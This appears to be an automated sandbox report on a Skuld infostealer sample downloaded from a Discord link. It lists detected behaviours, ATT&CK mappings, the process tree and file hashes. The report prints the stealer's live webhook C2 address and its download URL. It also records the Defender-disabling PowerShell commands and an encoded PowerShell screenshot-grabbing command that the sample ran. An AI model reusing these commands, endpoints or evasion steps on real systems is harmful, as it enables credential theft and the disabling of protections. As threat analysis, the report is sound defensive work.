Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://cdn.discorda...

windows10-2004-x64

10

Analysis

  • max time kernel
    1200s
  • max time network
    1139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-09-2024 21:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://cdn.discordapp.com/attachments/1247299953315938336/1280271915197399113/speed.exe?ex=66d779a2&is=66d62822&hm=defe9cb6339053d13138dfdfd917bacbdbc2fb89a8994d2ccd0ed577b2bfa76c&

Score
10/10
skuldcredential_accessdefense_evasiondiscoveryexecutionpersistenceprivilege_escalationspywarestealerupx

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1279926585402593512/-p7sFnb_2x6CbCygjElBC0Haj-3_Y2RxDPvXsumD8jWDE7C7BvP3uhfi8a5Z45S9Whkt

Signatures

  • Skuld stealer

    An info stealer written in Go lang.

    stealerskuld
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

    discovery
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
    evasionspywaretrojan
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1247299953315938336/1280271915197399113/speed.exe?ex=66d779a2&is=66d62822&hm=defe9cb6339053d13138dfdfd917bacbdbc2fb89a8994d2ccd0ed577b2bfa76c&
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4480
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff84c9246f8,0x7ff84c924708,0x7ff84c924718
      2⤵
        PID:2672
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
        2⤵
          PID:2960
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3932
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:8
          2⤵
            PID:2656
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
            2⤵
              PID:4384
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
              2⤵
                PID:612
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
                2⤵
                  PID:940
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:628
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
                  2⤵
                    PID:3836
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
                    2⤵
                      PID:2200
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5196 /prefetch:8
                      2⤵
                        PID:4416
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
                        2⤵
                          PID:4192
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
                          2⤵
                            PID:3916
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
                            2⤵
                              PID:4808
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6460 /prefetch:8
                              2⤵
                                PID:4708
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6584 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2060
                              • C:\Users\Admin\Downloads\speed.exe
                                "C:\Users\Admin\Downloads\speed.exe"
                                2⤵
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Maps connected drives based on registry
                                • Modifies system certificate store
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5244
                                • C:\Windows\system32\attrib.exe
                                  attrib +h +s C:\Users\Admin\Downloads\speed.exe
                                  3⤵
                                  • Views/modifies file attributes
                                  PID:5592
                                • C:\Windows\system32\attrib.exe
                                  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                  3⤵
                                  • Views/modifies file attributes
                                  PID:5616
                                • C:\Windows\System32\Wbem\wmic.exe
                                  wmic csproduct get UUID
                                  3⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5644
                                • C:\Windows\System32\Wbem\wmic.exe
                                  wmic path win32_VideoController get name
                                  3⤵
                                  • Detects videocard installed
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5736
                                • C:\Windows\System32\Wbem\wmic.exe
                                  wmic os get Caption
                                  3⤵
                                    PID:5776
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\Downloads\speed.exe
                                    3⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5828
                                  • C:\Windows\System32\Wbem\wmic.exe
                                    wmic cpu get Name
                                    3⤵
                                      PID:5976
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                      3⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:6028
                                    • C:\Windows\System32\Wbem\wmic.exe
                                      wmic path win32_VideoController get name
                                      3⤵
                                      • Detects videocard installed
                                      PID:6108
                                    • C:\Windows\System32\Wbem\wmic.exe
                                      wmic csproduct get UUID
                                      3⤵
                                        PID:5176
                                      • C:\Windows\system32\attrib.exe
                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                        3⤵
                                        • Drops file in Drivers directory
                                        • Views/modifies file attributes
                                        PID:2788
                                      • C:\Windows\system32\attrib.exe
                                        attrib +r C:\Windows\System32\drivers\etc\hosts
                                        3⤵
                                        • Drops file in Drivers directory
                                        • Views/modifies file attributes
                                        PID:1756
                                      • C:\Windows\system32\netsh.exe
                                        netsh wlan show profiles
                                        3⤵
                                        • Event Triggered Execution: Netsh Helper DLL
                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                        PID:3852
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                        3⤵
                                          PID:5228
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\so5f24g4\so5f24g4.cmdline"
                                            4⤵
                                              PID:5612
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEBB8.tmp" "c:\Users\Admin\AppData\Local\Temp\so5f24g4\CSC17A35D4ED7074DED8025CC34495EF016.TMP"
                                                5⤵
                                                  PID:5664
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,8438354196792000229,709077737438664035,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4816 /prefetch:2
                                            2⤵
                                              PID:5676
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:4296
                                            • C:\Windows\System32\CompPkgSrv.exe
                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                              1⤵
                                                PID:1820
                                              • C:\Windows\System32\GameBarPresenceWriter.exe
                                                "C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
                                                1⤵
                                                • Network Service Discovery
                                                PID:5356
                                              • C:\Windows\system32\OpenWith.exe
                                                C:\Windows\system32\OpenWith.exe -Embedding
                                                1⤵
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5388
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
                                                1⤵
                                                • Drops desktop.ini file(s)
                                                • Checks processor information in registry
                                                • Modifies registry class
                                                PID:5432
                                              • C:\Windows\system32\OpenWith.exe
                                                C:\Windows\system32\OpenWith.exe -Embedding
                                                1⤵
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5668
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
                                                1⤵
                                                • Checks processor information in registry
                                                • Modifies registry class
                                                PID:5976

                                              Network

                                              MITRE ATT&CK Enterprise v15

                                              Reconnaissance

                                              Resource Development

                                              Initial Access

                                              Execution

                                              Command and Scripting Interpreter

                                              1
                                              T1059

                                              PowerShell

                                              1
                                              T1059.001

                                              Persistence

                                              Boot or Logon Autostart Execution

                                              1
                                              T1547

                                              Registry Run Keys / Startup Folder

                                              1
                                              T1547.001

                                              Event Triggered Execution

                                              1
                                              T1546

                                              Netsh Helper DLL

                                              1
                                              T1546.007

                                              Privilege Escalation

                                              Boot or Logon Autostart Execution

                                              1
                                              T1547

                                              Registry Run Keys / Startup Folder

                                              1
                                              T1547.001

                                              Event Triggered Execution

                                              1
                                              T1546

                                              Netsh Helper DLL

                                              1
                                              T1546.007

                                              Defense Evasion

                                              Hide Artifacts

                                              1
                                              T1564

                                              Hidden Files and Directories

                                              1
                                              T1564.001

                                              Modify Registry

                                              2
                                              T1112

                                              Obfuscated Files or Information

                                              1
                                              T1027

                                              Command Obfuscation

                                              1
                                              T1027.010

                                              Subvert Trust Controls

                                              1
                                              T1553

                                              Install Root Certificate

                                              1
                                              T1553.004

                                              Credential Access

                                              Credentials from Password Stores

                                              1
                                              T1555

                                              Credentials from Web Browsers

                                              1
                                              T1555.003

                                              Unsecured Credentials

                                              4
                                              T1552

                                              Credentials In Files

                                              4
                                              T1552.001

                                              Discovery

                                              Browser Information Discovery

                                              1
                                              T1217

                                              Network Service Discovery

                                              1
                                              T1046

                                              Peripheral Device Discovery

                                              1
                                              T1120

                                              Query Registry

                                              3
                                              T1012

                                              System Information Discovery

                                              4
                                              T1082

                                              System Network Configuration Discovery

                                              1
                                              T1016

                                              Wi-Fi Discovery

                                              1
                                              T1016.002

                                              Lateral Movement

                                              Collection

                                              Data from Local System

                                              3
                                              T1005

                                              Command and Control

                                              Web Service

                                              1
                                              T1102

                                              Exfiltration

                                              Impact

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                Filesize

                                                2KB

                                                MD5

                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                SHA1

                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                SHA256

                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                SHA512

                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                Filesize

                                                152B

                                                MD5

                                                53bc70ecb115bdbabe67620c416fe9b3

                                                SHA1

                                                af66ec51a13a59639eaf54d62ff3b4f092bb2fc1

                                                SHA256

                                                b36cad5c1f7bc7d07c7eaa2f3cad2959ddb5447d4d3adcb46eb6a99808e22771

                                                SHA512

                                                cad44933b94e17908c0eb8ac5feeb53d03a7720d97e7ccc8724a1ed3021a5bece09e1f9f3cec56ce0739176ebbbeb20729e650f8bca04e5060c986b75d8e4921

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                Filesize

                                                152B

                                                MD5

                                                e765f3d75e6b0e4a7119c8b14d47d8da

                                                SHA1

                                                cc9f7c7826c2e1a129e7d98884926076c3714fc0

                                                SHA256

                                                986443556d3878258b710d9d9efbf4f25f0d764c3f83dc54217f2b12a6eccd89

                                                SHA512

                                                a1872a849f27da78ebe9adb9beb260cb49ed5f4ca2d403f23379112bdfcd2482446a6708188100496e45db1517cdb43aba8bb93a75e605713c3f97cd716b1079

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
                                                Filesize

                                                124KB

                                                MD5

                                                ef8dad0aa93f72dc11b1e58a3182b163

                                                SHA1

                                                67575003b50cfa058db01bdfa8f0263f7806d871

                                                SHA256

                                                bbca0fef64778b04960fc042cc4f365541e7858816171f28fd5e9ab96ac562b9

                                                SHA512

                                                d490da5264534f92d19dcd2fdf3c97869461afc42d79490ac4ba6a2d8613cbcb6542560bd6eeaa5de22679fd2e1906aed687eb7420c6176ea2887f046e5809d3

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                Filesize

                                                186B

                                                MD5

                                                094ab275342c45551894b7940ae9ad0d

                                                SHA1

                                                2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

                                                SHA256

                                                ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

                                                SHA512

                                                19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

                                                Download Submit

